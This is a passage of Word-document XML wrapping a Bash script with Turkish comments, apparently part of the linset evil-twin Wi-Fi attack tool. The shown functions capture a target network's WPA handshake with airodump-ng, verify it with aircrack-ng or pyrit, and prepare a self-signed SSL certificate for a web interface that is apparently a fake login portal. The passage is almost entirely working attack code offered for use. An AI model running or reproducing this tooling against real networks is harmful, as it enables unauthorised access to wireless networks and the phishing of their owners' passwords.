        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>4 ) killall airodump-ng &amp;&gt;$linset_output_device; CSVDB=dump-01.csv; breakmode=1; selection; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED8C26B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>5 ) exitmode; break;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA759DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) echo "Bilinmeyen seçenek.Tekrar seç"; conditional_clear ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F48B3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004FDED" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E5386" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01272123" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552EECF1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0444C05C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Tüm ağları yakalayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C942A17" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function capture {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1F95B0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE58E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32657933" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! ps -A | grep -q airodump-ng; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E766DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D61A46B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>rm -rf $DUMP_PATH/$Host_MAC*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ED7403" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>xterm $HOLD -title "AĞDA EL SIKIŞMA YAKALAMA $Host_SSID" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $Host_MAC -w $DUMP_PATH/$Host_MAC -c $Host_CHAN -a $WIFI_MONITOR &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61887A71" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE3BB5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D575DB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="35172A00" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Devam etmeden önce tokalaşmayı kontrol edin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B31ADD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function checkhandshake {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761A7A75" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8C31A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$handshakemode" = "normal" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1AC2A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF69A82" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall airodump-ng &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25921923" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>certssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB181F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2039573F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4DAA3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Handshake_statuscheck="${kirmizi}YAKALAYAMADI!!!$yenidenrenklendir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD47562" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A80618" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>elif [ "$handshakemode" = "hard" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFEAA39" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>cp $DUMP_PATH/$Host_MAC-01.cap $DUMP_PATH/test.cap &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D52EF1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68768C1F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if pyrit -r $DUMP_PATH/test.cap analyze 2&gt;&amp;1 | grep -q "good,"; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA606C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall airodump-ng &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0881DCF0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>certssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7905A486" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68859181" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672BE032" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1944D24E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Handshake_statuscheck="${sari}Corrupto$yenidenrenklendir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0044C2A5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EBF248" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Handshake_statuscheck="${kirmizi}Malo$yenidenrenklendir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA92CB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169E476C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5126AD43" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D1B190" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>rm $DUMP_PATH/test.cap &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E95D36E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DCEEF0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC74E11" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7B0ADD0E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6ACF5E17" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">function certssl </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305989E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760B110A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#Kendinden imzalı SSL sertifikasının var olduğunu ve doğru olduğunu doğrulayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2199B574" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="20D2F0B2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ -f $DUMP_PATH/server.pem ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57689010" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ -s $DUMP_PATH/server.pem ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616BA6E1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>webinterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDE33F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633DC1A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8FA0CA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718734C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "  (!) Geçersiz SSL sertifikası - Seçiniz..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C05A6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58417F61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"1)"$yenidenrenklendir" SSL sertifikası oluştur"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C0906A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"2)"$yenidenrenklendir" SSL Sertifikası için tekrar arayın"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D712D17" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"3)"$yenidenrenklendir" Çıkış"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBAB7D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4EB60C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n '      #&gt; '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AAC9D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D40A6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4B760575" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BC3B97" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) creassl;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1546BA6B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2 ) certssl;break;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A54F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>3 ) exitmode; break;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B49729F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) certssl ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF2C21" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CDD41" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3890FCC7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E2301" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1A67E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED1467" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "  (!) Geçersiz SSL sertifikası - Seçiniz..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E348B16" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C89267" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"1)"$yenidenrenklendir" SSL sertifikası oluştur"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A530DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"2)"$yenidenrenklendir" SSL Sertifikası için tekrar arayın"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51507802" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"3)"$yenidenrenklendir" Çıkış"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718C9F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D087EB1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n '      #&gt; '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F1191A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715CDB40" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12541A2B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C9719" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) creassl;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BD6BC1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2 ) certssl; break;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DBA480" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>3 ) exitmode; break;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F42B717" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) certssl ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76B91B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA83327" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BF19B1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F494976" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993E327" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DF3E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4001FF17" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="27A3F4F7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F978E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># Kendinden İmzalı SSL Sertifikası Oluşturun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F1EB7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function creassl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A1731" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20087BEF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
